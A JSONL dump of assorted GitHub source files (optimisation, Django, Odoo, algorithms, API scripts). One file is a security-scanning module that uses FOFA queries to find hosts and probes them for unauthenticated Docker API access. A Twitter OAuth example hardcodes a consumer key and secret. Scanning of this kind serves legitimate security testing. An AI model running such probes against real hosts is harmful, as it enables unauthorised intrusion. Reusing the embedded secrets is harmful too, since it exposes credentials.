+{"seq_id":"75008029207","text":"import cma\nfrom scipy.optimize import differential_evolution as scipy_de\nfrom scipy.optimize import minimize\nimport numpy as np\n\nWORKLOAD_FACTOR = 0.001\n\n\ndef objective_f(loads, *args):\n '''objective function to be minimized'''\n goal = args[0]\n model_perf_func = args[1]\n model_parameters = args[2]\n training_days = args[3]\n plan_length = args[4]\n prequel_plan = args[5]\n pp_func = args[6]\n plan = map_loads_to_training_days(loads, training_days, plan_length)\n plan = pp_func(plan)\n plan_perf = model_perf_func(prequel_plan + plan, **model_parameters)\n total_workload = sum(plan)\n fitness_wo_load = abs(goal - plan_perf)\n fitness_with_load = fitness_wo_load + WORKLOAD_FACTOR * total_workload\n return fitness_with_load\n\n\ndef map_loads_to_training_days(loads, training_days, plan_length):\n plan = [0.0] * plan_length\n for i, l in zip(training_days, loads):\n plan[i] = l\n return plan\n\n\ndef genplan(length, # in weeks\n goal,\n training_days,\n max_load,\n model_func,\n prequel_plan,\n pp_func,\n **model_parameters):\n '''generate a plan with cma.fmin'''\n x0 = [0.0] * len(training_days)\n options = cma.CMAOptions()\n options.set('bounds', [0.0, max_load])\n # options.set('verb_disp', 0)\n # options.set('verbose', -9)\n # options.set('verb_log', 0)\n # options.set('maxiter', 800)\n args = (goal, model_func, model_parameters, training_days, length * 7,\n prequel_plan, pp_func)\n print('max_load {}'.format(max_load))\n sigma = max_load / 4\n solution = cma.fmin(objective_f, x0, sigma, args=args, options=options)\n plan = map_loads_to_training_days(solution[0], training_days, length * 7)\n return plan\n\n\ndef genplan_de(length, # in weeks\n goal,\n training_days,\n max_load,\n model_func,\n prequel_plan,\n pp_func,\n **model_parameters):\n bounds = [(0, max_load)] * len(training_days)\n args = (goal, model_func, model_parameters, training_days, length * 7,\n prequel_plan, pp_func)\n solution = scipy_de(objective_f,\n bounds, args=args,\n mutation=(1, 1.99),\n recombination=0.5,\n disp=True)\n solution.x = pp_func(solution.x)\n plan = map_loads_to_training_days(solution.x, training_days, length * 7)\n return plan\n\n\ndef genplan_minimize(length, # in weeks\n goal,\n training_days,\n max_load,\n model_func,\n prequel_plan,\n pp_func,\n **model_parameters):\n x0 = np.array([0.0] * len(training_days)) # initial guess\n args = (goal, model_func, model_parameters, training_days, length * 7,\n prequel_plan, pp_func)\n bounds = [(0.0, max_load)] * len(training_days)\n options = {'maxiter': 400, 'disp': False}\n\n def iter_callback(xk):\n print(\"current parameter vector: {}\".format(xk))\n\n optres = minimize(objective_f,\n x0,\n args,\n 'L-BFGS-B',\n bounds=bounds,\n options=options,\n callback=iter_callback)\n return optres\n","repo_name":"dawedawe/traipor","sub_path":"app/training/cmaes_planning.py","file_name":"cmaes_planning.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15113983560","text":"from django.shortcuts import render\r\nfrom app.forms import Anprform\r\nfrom app.lpr import detect\r\nfrom django.conf import settings\r\nfrom app.models import Anpr\r\nimport os\r\n\r\n\r\n# Create your views here.\r\n\r\ndef index(request):\r\n form = Anprform()\r\n\r\n if request.method == 'POST':\r\n form = Anprform(request.POST or None, request.FILES or None)\r\n if form.is_valid():\r\n save = form.save(commit=True)\r\n\r\n primary_key = save.pk\r\n imgobj = Anpr.objects.get(pk=primary_key)\r\n fileroot = str(imgobj.image)\r\n filepath = os.path.join(settings.MEDIA_ROOT, fileroot)\r\n results = detect(filepath)\r\n print(results)\r\n return render(request, \"index.html\",{'form':form, 'upload':True,'results':results})\r\n\r\n return render(request, \"index.html\",{'form':form, 'upload':False})\r\n","repo_name":"Atin-123/number-plate-recognition","sub_path":"anpr/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4878853671","text":"from collections import deque\nfrom collections import defaultdict\n\nclass Solution:\n \"\"\"\n @param org: a permutation of the integers from 1 to n\n @param seqs: a list of sequences\n @return: true if it can be reconstructed only one or false\n \"\"\"\n def sequenceReconstruction(self, org, seqs):\n graph = self.build_graph(seqs)\n if len(org) != len(graph):\n return False\n indegrees = self.get_indegrees(graph)\n return self.can_reconstuct(org, graph, indegrees)\n\n def can_reconstuct(self, org, graph, indegrees):\n queue = deque()\n visited = set()\n for node, v in indegrees.items():\n if v == 0:\n visited.add(node)\n queue.append(node)\n order = []\n while queue:\n if len(queue) != 1:\n return False\n head = queue.popleft()\n order.append(head)\n for nb in graph[head]:\n if nb in visited:\n continue\n indegrees[nb] -= 1\n if indegrees[nb] == 0:\n queue.append(nb)\n return order == org\n\n def build_graph(self, seqs):\n graph = {}\n for li in seqs:\n for i in li:\n graph[i] = []\n\n for li in seqs:\n for i in range(1, len(li)):\n graph[li[i-1]].append(li[i])\n return graph\n\n def get_indegrees(self, graph):\n indegrees = defaultdict(int)\n for node, nbs in graph.items():\n if node not in indegrees:\n indegrees[node] = 0\n for nb in nbs:\n indegrees[nb] += 1\n return indegrees","repo_name":"ZhouningMan/LeetCodePython","sub_path":"bfs/SequenceReconstruction.py","file_name":"SequenceReconstruction.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26619562793","text":"#!/usr/bin/env python\n\"\"\"Utility to create a folder with opt_cif_ddec CIFs.\"\"\"\nimport os\nfrom aiida.orm.querybuilder import QueryBuilder\nfrom aiida.orm import Group, CifData\n\nfrom pipeline_config import load_profile\nload_profile()\n\nTAG_KEY = \"tag4\"\nCIFS_DIR = \"./cifs_cellopt/\"\n\nos.mkdir(CIFS_DIR)\n\nqb = QueryBuilder()\nqb.append(Group, project=['label'], filters={'label': {'like': r\"curated-cof\\_%\"}}, tag='group')\nqb.append(CifData, project=['*'], filters={'extras.{}'.format(TAG_KEY): 'opt_cif_ddec'}, with_group='group')\nqb.order_by({CifData: {'label': 'asc'}})\n\nfor q in qb.all():\n mat_id = q[0].split(\"_\")[1]\n ddec_cif = q[1]\n ddec_cif.label = mat_id + \"_DDEC\"\n filename = '{}_ddec.cif'.format(mat_id)\n cifile = open(os.path.join(CIFS_DIR, filename), 'w+')\n print(ddec_cif.get_content(), file=cifile)\n print(\"{},{}\".format(mat_id, ddec_cif))\n","repo_name":"materialscloud-org/discover-curated-cofs","sub_path":"make_export/create_cif_opt_dir.py","file_name":"create_cif_opt_dir.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"3200452383","text":"from rauth import OAuth1Service\n \ntry:\n read_input = raw_input\nexcept NameError:\n read_input = input\n \n# Get a real consumer key & secret from https://dev.twitter.com/apps/new\ntwitter = OAuth1Service(\n name='twitter',\n consumer_key='J8MoJG4bQ9gcmGh8H7XhMg',\n consumer_secret='7WAscbSy65GmiVOvMU5EBYn5z80fhQkcFWSLMJJu4',\n request_token_url='https://api.twitter.com/oauth/request_token',\n access_token_url='https://api.twitter.com/oauth/access_token',\n authorize_url='https://api.twitter.com/oauth/authorize',\n base_url='https://api.twitter.com/1.1/')\n \nrequest_token, request_token_secret = twitter.get_request_token()\n \nauthorize_url = twitter.get_authorize_url(request_token)\n \nprint('Visit this URL in your browser: {url}'.format(url=authorize_url))\npin = read_input('Enter PIN from browser: ')\n \nsession = twitter.get_auth_session(request_token,\n request_token_secret,\n method='POST',\n data={'oauth_verifier': pin})\n \nparams = {'include_rts': 1, # Include retweets\n 'count': 10} # 10 tweets\n \nr = session.get('statuses/home_timeline.json', params=params, verify=True)\n \nfor i, tweet in enumerate(r.json(), 1):\n handle = tweet['user']['screen_name']\n text = tweet['text']\n print(u'{0}. @{1} - {2}'.format(i, handle, text))\n","repo_name":"litl/rauth","sub_path":"examples/twitter-timeline-cli.py","file_name":"twitter-timeline-cli.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":1605,"dataset":"github-code","pt":"31"} +{"seq_id":"19065284209","text":"from django.contrib import admin\nfrom .models import Course, Tray, History\n# Register your models here.\n\n\nclass CourseAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ['course_name']}),\n (None, {'fields': ['course_description']}),\n (None, {'fields': ['course_category']}),\n (None, {'fields': ['course_unit']}),\n (None, {'fields': ['course_price']}),\n ]\n\n\nclass TrayAdmin(admin.ModelAdmin):\n fieldssets = [\n (None, {'fields': ['created_date']}),\n (None, {'fields': ['tray_cumulative_price']}),\n ]\n\n\nclass HistoryAdmin(admin.ModelAdmin):\n fieldsets = [\n (None, {'fields': ['history_points']}),\n ]\n\n\nadmin.site.register(Course, CourseAdmin)\nadmin.site.register(Tray, TrayAdmin)\nadmin.site.register(History, HistoryAdmin)\n","repo_name":"jemartpacilan/Catr","sub_path":"orders/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15191151678","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError, ValidationError, Warning\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\nimport datetime\nimport pytz\n\nDEFAULT_TIMEZONE = 'America/Lima'\n\nclass PosConfiguration(models.Model):\n _inherit = 'pos.config'\n \n check = fields.Boolean(string='Import Sale Order', default=False)\n load_orders_days = fields.Integer('Load Orders of Last Days')\n\nclass InheritPOSOrder(models.Model):\n _inherit = 'pos.order'\n \n def search_all_sale_order(self,config_id,l_date):\n final_order = []\n last_day = datetime.datetime.strptime(l_date,DEFAULT_SERVER_DATETIME_FORMAT)\n config = self.env['pos.config'].browse(config_id)\n #if config.load_orders_days > 0:\n # sale_orders = self.env['sale.order'].search([('date_order','>=',last_day)])\n # domain.append(('date_order','>=',last_day))\n #else:\n # sale_orders = self.env['sale.order'].search([])\n domain = [('company_id','=',config.company_id.id), ('currency_id','=',config.currency_id.id)]\n if config.load_orders_days > 0 :\n domain.append(('date_order','>=',last_day))\n sale_orders = self.env['sale.order'].sudo().search(domain)\n for s in sale_orders:\n vals1 = {\n 'id':s.id,\n 'name': s.name,\n 'state' : s.state,\n 'partner_id' : [s.partner_id.id,s.partner_id.name],\n 'user_id':[s.user_id.id,s.user_id.name],\n 'amount_untaxed':s.amount_untaxed,\n 'order_line':s.order_line.ids,\n 'amount_tax':s.amount_tax,\n 'amount_total':s.amount_total,\n 'company_id':[s.company_id.id,s.company_id.name],\n #'date_order':s.date_order,\n 'date_order':s.date_order.astimezone(pytz.timezone(self.env.user.tz or DEFAULT_TIMEZONE)).strftime('%d/%m/%Y, %H:%M:%S'),\n }\n final_order.append(vals1)\n return final_order\n \n def return_new_order_line(self):\n orderlines = self.env['sale.order.line'].search([('order_id.id','=', self.id)])\n final_lines = []\n for l in orderlines:\n vals1 = {\n 'discount': l.discount,\n 'id': l.id,\n 'order_id': [l.order_id.id, l.order_id.name],\n 'price_unit': l.price_unit,\n 'product_id': [l.product_id.id, l.product_id.name],\n 'product_uom_qty': l.product_uom_qty,\n 'price_subtotal' : l.price_subtotal,\n }\n final_lines.append(vals1)\n return final_lines\n \n def sale_order_line(self):\n orderlines = self.env['sale.order.line'].sudo().search([])\n final_lines = []\n for l in orderlines:\n vals1 = {\n 'discount': l.discount,\n 'id': l.id,\n 'order_id': [l.order_id.id, l.order_id.name],\n 'price_unit': l.price_unit,\n 'product_id': [l.product_id.id, l.product_id.name],\n 'product_uom_qty': l.product_uom_qty,\n 'price_subtotal' : l.price_subtotal,\n }\n final_lines.append(vals1)\n return final_lines\n","repo_name":"MeditechSolutions/pruebagntrky-e","sub_path":"bi_pos_import_sale/models/pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12618930468","text":"import json\nfrom os import environ\n\nimport requests\n\n# get api key from https://dashboard.api-football.com/soccer/tester\nAPI_KEY = environ.get(\"API_KEY\")\n\n\ndef call_api(url, api_key=API_KEY):\n \"\"\"send request to api and return data dictionary\"\"\"\n # ucl league id = 2\n headers = headers = {\n \"x-rapidapi-host\": \"v3.football.api-sports.io\",\n \"x-rapidapi-key\": api_key,\n }\n res = requests.get(url, headers=headers)\n\n data = res.json()\n return data\n\n\ngroup_data = call_api(\n \"https://v3.football.api-sports.io/standings?league=2&season=2021\"\n)\n\ngroup_standings = group_data[\"response\"][0][\"league\"][\"standings\"]\n\n\n# dump to file\nwith open(\"ucl-groups-2021.json\", \"w+\") as f:\n f.write(json.dumps(group_standings))\n\nteam_data = call_api(\n \"https://v3.football.api-sports.io/teams?league=2&season=2021\"\n)\n\n# add team id as key of team dict\nindexed_team_data = {}\nfor team in team_data[\"response\"]:\n indexed_team_data[team[\"team\"][\"id\"]] = team\n\n# dump to file\nwith open(\"ucl-teams-2021.json\", \"w+\") as f:\n f.write(json.dumps(indexed_team_data))\n","repo_name":"ismailmo1/ucl-draw","sub_path":"src/data/fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"28205901441","text":"# -*- coding: utf-8 -*-\n# 求素数\n\n'''\nCreated on Feb 20, 2016\n\n@author: xuyi\n'''\n\ndef primes():\n yield 2\n it = _odd_iter()\n while True:\n n = next(it)\n yield n\n it = filter(_not_divisable(n),it)\n\ndef _odd_iter():\n n = 1\n while True:\n n = n + 2\n yield n\n\ndef _not_divisable(n):\n return lambda x : x % n > 0\n\nif __name__ == '__main__':\n for n in primes():\n if n < 1000:\n print(n)\n else:\n break\n pass","repo_name":"MyXOF/learn-py","sub_path":"function-program/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40847865961","text":"import sys\nfrom collections import deque\n\nN, M = map(int, sys.stdin.readline().strip().split())\ngraph = [[] for _ in range(N)]\nfor _ in range(M):\n a, b = map(int, sys.stdin.readline().strip().split())\n graph[a].append(b)\n graph[b].append(a)\n \ndef dfs(visited, u, depth):\n\n visited[u] = True\n \n if depth >= 5:\n return True\n \n for v in graph[u]:\n if visited[v] == False:\n if dfs(visited, v, depth+1):\n return True\n visited[v] = False\n \n return False\n\nfor i in range(N):\n visited = [False]*N\n if dfs(visited, i, 1):\n print(1)\n exit()\n \nprint(0)\n\n''' review\nbfs로 풀면 안됨.\n4 4\n0 1\n1 2\n2 3\n3 0\n이런 경우에 사이클이 발생해서 depth가 3으로 밖에 안나옴\n\n특히, dfs를 돌고나서 visited[v]=False하는게 중요함.\n다른 경로로 해당 노드를 다시 방문할 수 있기 때문.,\n'''","repo_name":"euroversedev/BaekJoonOJ_Python","sub_path":"Searching/13023_3.py","file_name":"13023_3.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7772037532","text":"#!/usr/bin/python3\n\"\"\"This module has functions for the infamous N-queens problem\"\"\"\nimport sys\n\n\ndef checkPos(board, pos):\n \"\"\"Function to check if a position is valid for a queen\"\"\"\n for r in range(pos[0]):\n if board[r][pos[1]] == 1:\n return False\n\n for r, p in zip(range(pos[0], -1, -1), range(pos[1], -1, -1)):\n if board[r][p] == 1:\n return False\n\n for r, p in zip(range(pos[0], -1, -1), range(pos[1], len(board), 1)):\n if board[r][p] == 1:\n return False\n\n return True\n\n\ndef nqueens(board, row, solutions):\n \"\"\"Recursive function to try board layouts\"\"\"\n if row == len(board):\n solutions.append(conv(board))\n\n for r in range(len(board)):\n if checkPos(board, (row, r)) is True:\n board[row][r] = 1\n nqueens(board, row + 1, solutions)\n board[row][r] = 0\n\n\ndef conv(sol):\n \"\"\"Function to convert styles of board descriptions\"\"\"\n fin = []\n for r in range(len(sol)):\n fin.append([])\n fin[r].append(r)\n for p in range(len(sol)):\n if sol[r][p] == 1:\n fin[r].append(p)\n break\n return fin\n\n\ndef main():\n \"\"\"Main function to check args and call recursion\"\"\"\n if len(sys.argv) != 2:\n print(\"Usage: nqueens N\")\n sys.exit(1)\n try:\n number = int(sys.argv[1])\n except ValueError:\n print(\"N must be a number\")\n sys.exit(1)\n if number < 4:\n print(\"N must be at least 4\")\n sys.exit(1)\n board = [[0] * number for x in range(number)]\n sols = []\n nqueens(board, 0, sols)\n for x in sols:\n print(x)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"haru-voster/alx-higher_level_programming","sub_path":"0x08-python-more_classes/101-nqueens.py","file_name":"101-nqueens.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42994370285","text":"#!/usr/bin/env python\n\nimport csv, math, os\nfrom contextlib import closing\nfrom PIL import Image, ImageDraw, ImageFont\n\ndata = []\nmax_rate = 0.0\nmax_range = 0.0\n\nwith closing(open('polar_range.csv', 'r')) as f:\n r = csv.reader(f)\n r.next() # header\n for row in r:\n b_start = float(row[0])\n b_end = float(row[1])\n r_start = float(row[2])\n r_end = float(row[3])\n updates = float(row[4])\n airsec = float(row[5])\n if airsec > 2.0:\n rate = float(updates) / airsec\n else:\n rate = 0.0\n\n if rate > 0:\n data.append( (b_start, b_end, r_start, r_end, rate) )\n max_rate = max(max_rate, rate)\n\ndata.append( (0,0,0,0,0) )\ndata.sort(lambda x,y: cmp( (y[3],x[0],y[2]), (x[3],y[0],x[2]) ) )\n\nfor s_start, s_end, r_start, r_end, rate in data:\n if rate > 1.0:\n max_range = r_end\n break\n\nmax_range = 360000.0\nmax_rate = 2.0\n\ndef color_for(x):\n if x == 0.0:\n return 'black'\n else:\n if x < 0.1: intensity = 0\n else: intensity = (1.0 * x / max_rate) ** 0.8\n return \"hsl(%d,%d%%,%d%%)\" % (0 + int(0 + intensity * 180), 100, int(30 + intensity*50)) \n\nSIZE = 800\nSCALE = ((SIZE-10) / max_range / 2)\nCENTER = SIZE/2\nim = Image.new(\"RGB\", (SIZE + 730,SIZE), \"black\")\n\ndraw = ImageDraw.Draw(im)\n\nlast_r_start = data[0][2]\nlast_r_end = data[0][3]\nlast_s_end = None\nfor s_start, s_end, r_start, r_end, rate in data:\n if r_end != last_r_end:\n # finish partial ring\n # if last_s_end is not None:\n # bounds = (int(CENTER - last_r_end * SCALE),\n # int(CENTER - last_r_end * SCALE),\n # int(CENTER + last_r_end * SCALE),\n # int(CENTER + last_r_end * SCALE)) \n # draw.pieslice(bounds, int(last_s_end-90), int(360-90), fill = '#101010')\n \n # clear inner part\n bounds = (int(CENTER - last_r_start * SCALE),\n int(CENTER - last_r_start * SCALE),\n int(CENTER + last_r_start * SCALE),\n int(CENTER + last_r_start * SCALE)) \n draw.ellipse(bounds, fill = '#101010')\n\n last_r_start = r_start\n last_r_end = r_end\n last_s_end = None\n\n # if last_s_end is not None and s_start != last_s_end:\n # bounds = (int(CENTER - r_end * SCALE),\n # int(CENTER - r_end * SCALE),\n # int(CENTER + r_end * SCALE),\n # int(CENTER + r_end * SCALE)) \n # draw.pieslice(bounds, int(last_s_end-90), int(s_start-90), fill = '#101010')\n\n bounds = (int(CENTER - r_end * SCALE),\n int(CENTER - r_end * SCALE),\n int(CENTER + r_end * SCALE),\n int(CENTER + r_end * SCALE)) \n draw.pieslice(bounds, int(s_start - 90), int(s_end-90), fill = color_for(rate))\n last_s_end = s_end\n\nfont = ImageFont.load_default()\nfor r in xrange(0, int(max_range) + 100000, 100000):\n bounds = (int(CENTER - r * SCALE),\n int(CENTER - r * SCALE),\n int(CENTER + r * SCALE),\n int(CENTER + r * SCALE))\n draw.ellipse(bounds, outline=\"#FFFFFF\")\n\n if r > 0:\n text = '%.0f km' % (r/1000.0)\n size = font.getsize(text)\n draw.text((CENTER + 5, CENTER - r * SCALE - 5 - size[1]), text, font=font, fill=\"#FFFFFF\")\n\ntext1 = 'Rate: 0'\nsize1 = font.getsize(text1)\ntext2 = '%.1f updates/s/aircraft' % max_rate\nsize2 = font.getsize(text2)\n\ndraw.text((5, 5), text1)\ndraw.text((5 + size1[0] + 5 + 102 + 5, 5), text2)\ndraw.rectangle((5 + size1[0] + 5, 5, 5 + size1[0] + 5 + 101, 5 + size1[1]), outline='#FFFFFF')\nfor i in xrange(0,100):\n c = i * max_rate / 100\n draw.line((5 + size1[0] + 5 + 1 + i, 6, 5 + size1[0] + 5 + 1 + i, 4 + size1[1]), fill=color_for(c))\n\nedata = []\nmin_elev = -5.0\nmax_elev = 0\nwith closing(open('polar_elev.csv', 'r')) as f:\n r = csv.reader(f)\n r.next() # header\n for row in r:\n b_start = float(row[0])\n b_end = float(row[1])\n e_start = float(row[2])\n e_end = float(row[3])\n count = float(row[4])\n unique = float(row[5])\n if unique > 0:\n rate = count / unique\n else:\n rate = 0.0\n\n if rate > 0:\n edata.append( (b_start, b_end, e_start, e_end, rate) )\n max_elev = max(e_end, max_elev)\n min_elev = min(e_start, min_elev)\n\nmin_elev = -5.0\nmax_elev = 90.0\n\nESCALE = -1.0 * SIZE / (max_elev - min_elev)\nEZERO = int(-1.0 * max_elev * ESCALE)\n\ndraw.rectangle( (SIZE,0,SIZE+730,SIZE), fill='black' )\n\nfor i in xrange(0,361,30):\n draw.line( (SIZE+5+i*2,\n EZERO+int(ESCALE*min_elev),\n SIZE+5+i*2,\n EZERO+int(ESCALE*max_elev)),\n fill='#202020' )\n\ni = 0.0\nwhile i < max_elev:\n draw.line( (SIZE+5,\n EZERO+int(ESCALE*i),\n SIZE+725,\n EZERO+int(ESCALE*i)),\n fill='#202020' )\n i += 5.0\n\ni = 0.0\nwhile i > min_elev:\n draw.line( (SIZE+5,\n EZERO+int(ESCALE*i),\n SIZE+725,\n EZERO+int(ESCALE*i)),\n fill='#202020' )\n i -= 5.0\n\nfor bs, be, es, ee, rate in edata:\n x1 = int(bs)*2 + SIZE+5\n x2 = int(be)*2 + SIZE+5\n y1 = EZERO + int(ESCALE * es)\n y2 = EZERO + int(ESCALE * ee)\n \n draw.rectangle( (x1,y1,x2,y2), fill=color_for(rate) )\n\ndraw.line( (SIZE+5,EZERO,SIZE+725,EZERO), fill='white' )\nfor i in xrange(0,361,30):\n draw.line( (SIZE+5+i*2,EZERO,SIZE+5+i*2,EZERO+5), fill='white' )\n text = '%03d' % i\n size = font.getsize(text)\n draw.text((SIZE+5+i*2 - size[0]/2, EZERO+10), text)\n\n\ndel draw\n\n#im.save(\"polar-new.png\")\n#os.rename(\"polar-new.png\", \"polar.png\")\nim.save(\"polar.png\")\n","repo_name":"mutability/dump1090-tools","sub_path":"polar-plots/adsb-polar-plot.py","file_name":"adsb-polar-plot.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"31"} +{"seq_id":"364452635","text":"\"\"\"\n1383. Maximum Performance of a Team\nYou are given two integers n and k and two integer arrays speed and efficiency both of length n. There are n engineers numbered from 1 to n. speed[i] and efficiency[i] represent the speed and efficiency of the ith engineer respectively.\n\nChoose at most k different engineers out of the n engineers to form a team with the maximum performance.\n\nThe performance of a team is the sum of their engineers' speeds multiplied by the minimum efficiency among their engineers.\n\nReturn the maximum performance of this team. Since the answer can be a huge number, return it modulo 109 + 7.\n\nExample 1:\nInput: n = 6, speed = [2,10,3,1,5,8], efficiency = [5,4,3,9,7,2], k = 2\nOutput: 60\nExplanation: \nWe have the maximum performance of the team by selecting engineer 2 (with speed=10 and efficiency=4) and engineer 5 (with speed=5 and efficiency=7). That is, performance = (10 + 5) * min(4, 7) = 60.\n\nExample 2:\nInput: n = 6, speed = [2,10,3,1,5,8], efficiency = [5,4,3,9,7,2], k = 3\nOutput: 68\nExplanation:\nThis is the same example as the first but k = 3. We can select engineer 1, engineer 2 and engineer 5 to get the maximum performance of the team. That is, performance = (2 + 10 + 5) * min(5, 4, 7) = 68.\n\nExample 3:\nInput: n = 6, speed = [2,10,3,1,5,8], efficiency = [5,4,3,9,7,2], k = 4\nOutput: 72\n\nConstraints:\n1 <= <= k <= n <= 105\nspeed.length == n\nefficiency.length == n\n1 <= speed[i] <= 105\n1 <= efficiency[i] <= 108\n\"\"\"\n\"\"\"\nn = 6, speed = [2,10,3,1,5,8], efficiency = [5,4,3,9,7,2], k = 2\n\nefficiency = [9, 7, 5, 4, 3, 2]\nspeed = [1, 5, 2, 10, 3, 8]\n\ncurrent = 42 (after first 2)\nsum = 6\nheap [1, 5]\n\nif (speed[i]+sum-heap[0])*efficiency[i] > current: then push and pop, update current\n\"\"\"\n# Time complexity: O(N * (log N + log K))\n# Space complexity: O(N+K)\nclass Solution:\n def maxPerformance(self, n: int, speed: List[int], efficiency: List[int], k: int) -> int:\n combined = sorted(zip(efficiency, speed), reverse=True)\n heap = []\n performance = total_vel = 0\n\n for eff, vel in combined:\n if len(heap) > k-1:\n total_vel -= heapq.heappop(heap)\n \n heapq.heappush(heap, vel)\n total_vel += vel\n performance = max(total_vel*eff, performance)\n return performance%(10**9+7)\n","repo_name":"victorplusc/Algorithms","sub_path":"Leetcode/1383. Maximum Performance of a Team.py","file_name":"1383. Maximum Performance of a Team.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"9988871906","text":"# coding=utf-8\n# @Author : zpchcbd HG team\n# @Time : 2021-08-27 18:36\nfrom urllib.parse import urlparse\n\nfrom colorama import Fore\nfrom tqdm import tqdm\n\nfrom exploit.web import BaseScript\nfrom core.MyEnums import *\nfrom core.request.asynchttp import *\n\n\n# fofa: app=\"docker-产品\"\n# python batch.py -m exploit.web.Unauth.Docker.Unauth -cs -fs \"app=\\\"docker-产品\\\"\"\n\n# fofa: port=\"2375\"\n# python batch.py -m exploit.web.Unauth.Docker.Unauth -cs -fs \"port=\\\"2375\\\" app=\\\"docker\\\"\"\n\nclass Script(BaseScript):\n name = 'Docker'\n\n def __init__(self, target, session):\n super().__init__()\n # 漏洞目标\n self.target = target\n # 漏洞等级\n self.bugLevel = BugLevel.HIGH\n # 类型\n self.bugType = BugType.UNAUTH\n # 编号\n self.bugNumber = ''\n # 来源\n self.refer = ''\n # 特定路径判断\n self.detectPathList = [':2375/containers/json', '/containers/json']\n # exec\n # self.execPathList = ['/execPath']\n # session\n self.session = session\n # 相关信息\n self.info = ''\n\n async def detect(self):\n try:\n urlLen = len(f'http://{self.target}'.split(':'))\n if urlLen == 2:\n url = f'http://{self.target}{self.detectPathList[0]}' if self.target.startswith(\n ('http:', 'https:')) is False else f'{self.target}{self.detectPathList[0]}'\n elif urlLen == 3:\n url = f'http://{self.target}{self.detectPathList[1]}' if self.target.startswith(\n ('http:', 'https:')) is False else f'{self.target}{self.detectPathList[1]}'\n async with self.session.get(url=url, headers=self.headers, timeout=self.reqTimeout, verify_ssl=False) as response:\n if response is not None and response.status == 200:\n text = await response.text()\n await asyncio.sleep(2)\n if 'HostConfig' in text:\n self.flag = True\n tqdm.write(Fore.RED + '[{}] {}'.format('Docker Unauth', url))\n return {'name': 'Docker Unauth', 'url': url, 'software': 'Docker'}\n except Exception:\n return None\n\n # async def exec(self):\n # try:\n # async with aiohttp.ClientSession() as session:\n # for execPath in self.execPathList:\n # url = f'http://{self.target}{execPath}' if self.target.startswith(\n # ('http:', 'https:')) is False else f'{self.target}{execPath}'\n # async with session.get(url=url, timeout=self.reqTimeout, verify_ssl=False) as response:\n # if response is not None:\n # text = await response.text()\n # await asyncio.sleep(2)\n # if 'something about keywords in the web' in text:\n # tqdm.write(Fore.RED + '[{}] {}'.format('Couchdb Unauth', url))\n # return {'name': 'Couchdb Unauth', 'url': url, 'software': 'Couchdb'}\n # except Exception:\n # return None\n\n async def attack(self, semaphore, pbar):\n async with semaphore:\n a = await self.detect()\n if a is not None:\n self.vulList.append(a)\n if self.flag:\n b = await self.exec()\n if b is not None:\n self.vulList.append(b)\n pbar.update(1)\n return self.vulList\n\n\nif __name__ == '__main__':\n pass\n # import requests\n # import hashlib\n #\n # resp = requests.get('https://50.84.113.154:8443/favicon.ico', verify=False)\n # if resp.status_code == 200:\n # m1 = hashlib.md5()\n # m1.update(resp.content)\n # theMD5 = m1.hexdigest()\n # print(theMD5)\n #\n semaphore = asyncio.Semaphore(500)\n sc = Script('116.30.7.120:2375', 1)\n l = asyncio.get_event_loop()\n l.run_until_complete(sc.attack(semaphore))\n","repo_name":"AkunWin/myscan","sub_path":"exploit/web/Unauth/Docker/Unauth.py","file_name":"Unauth.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"13034524881","text":"import json\nimport requests\nimport unittest\n\n\nclass APITestCase(unittest.TestCase):\n def setUp(self):\n # self.api_url = \"http://snowball.bot-e.com\"\n self.api_url = \"http://localhost:6464\"\n self.headers = {\"Content-Type\": \"application/json\"}\n\n def test_api_endpoint(self):\n prompt_data = {\"question\": \"what is the meaning of human life?\"}\n response = requests.post(\n f\"{self.api_url}/ask\", data=json.dumps(prompt_data), headers=self.headers\n )\n data = response.json()\n\n # Check the response status code\n self.assertEqual(response.status_code, 200)\n\n # Check the response format based on the actual behavior\n # self.assertIsInstance(data, dict)\n self.assertTrue(\n len(data[\"question_id\"]) == 11, \"The question_id is not 11 characters long\"\n )\n # ... Other assertions as needed\n\n\nif __name__ == \"__main__\":\n 